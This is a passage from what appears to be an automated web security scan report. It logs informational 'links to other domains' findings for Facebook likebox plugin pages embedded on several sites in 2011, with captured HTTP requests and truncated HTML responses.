GET /plugins/likebox.php?api_key=181790778546301&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a42cadd4%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fthedailygreen&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.227.37
X-Cnection: close
Date: Sat, 17 Sep 2011 16:28:06 GMT
Content-Length: 12531

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/thedailygreen" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23284_22125990663_6669_q.jpg" alt="TheDailyGreen.com" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49293_769813126_331185_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1259942327" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276394_1259942327_394083337_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/amsalihu" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275585_1799172657_953518884_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274226_1712664751_2931295_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=529117363" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/70759_529117363_7781661_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/leannafruengenslovesjesus" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275544_100002905511290_1009319816_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.156. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.233.34
X-Cnection: close
Date: Sat, 17 Sep 2011 16:31:24 GMT
Content-Length: 13378

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/joshpool" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275555_777910353_3799524_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sceena" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260935_100000022851602_6469469_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/santingo.munez" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275514_1542670092_2028795952_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
18.157. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.26.62
X-Cnection: close
Date: Sat, 17 Sep 2011 16:49:55 GMT
Content-Length: 13384

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gambit1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276158_100001388115409_327296_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/santingo.munez" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275514_1542670092_2028795952_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Yga.akrm" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275087_100001397283431_7911289_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000716085860" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274868_100000716085860_1952489414_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/joshpool" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275555_777910353_3799524_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.158. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.40.62
X-Cnection: close
Date: Sat, 17 Sep 2011 16:36:56 GMT
Content-Length: 13437

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000709442763" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275024_100000709442763_3538361_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827955211" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274938_100002827955211_1963275250_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=522614474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274989_522614474_1952426039_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000011373592" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275853_100000011373592_7260339_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sceena" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/260935_100000022851602_6469469_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/santingo.munez" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275514_1542670092_2028795952_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ita.suhartini" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275728_100002552097053_3727622_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000716085860" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274868_100000716085860_1952489414_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/wilmar.duran" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275700_590147740_2138694377_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002827128746" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
18.159. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=184150621627178&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df435cdcb4%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fdelish&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.235.67
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Length: 13304

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/delish" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41800_41937927436_1675033_q.jpg" alt="Delish.com" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274798_1447788607_1354336429_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/PalmSpringsCrafting" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41652_100001454431410_2482_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/dianem.schleuder" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41659_100000594759795_9055_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/melguendi" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273567_596261419_149286564_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/rudy.serna1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186290_1778113279_1452089_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186594_605898898_4602913_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48824_100000953317887_1853199_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/gene.plank" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/261002_680624115_1419105325_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/boxer82" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275044_100000470238912_7888215_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275753_1747255773_594240268_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.160. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.8.46
X-Cnection: close
Date: Sat, 17 Sep 2011 16:29:58 GMT
Content-Length: 13358

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/YjSJRXYRwqD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/t_s9qY1gNKg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/1iO7XjW7Qh8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/HqR1Y_NYBkz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/i9AGFgh-UYl.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/mfIzqmOUElv.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/Auo4xRDh0AB.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/ugodotcom" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211197_44296099908_3622960_q.jpg" alt="UGO Entertainment" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
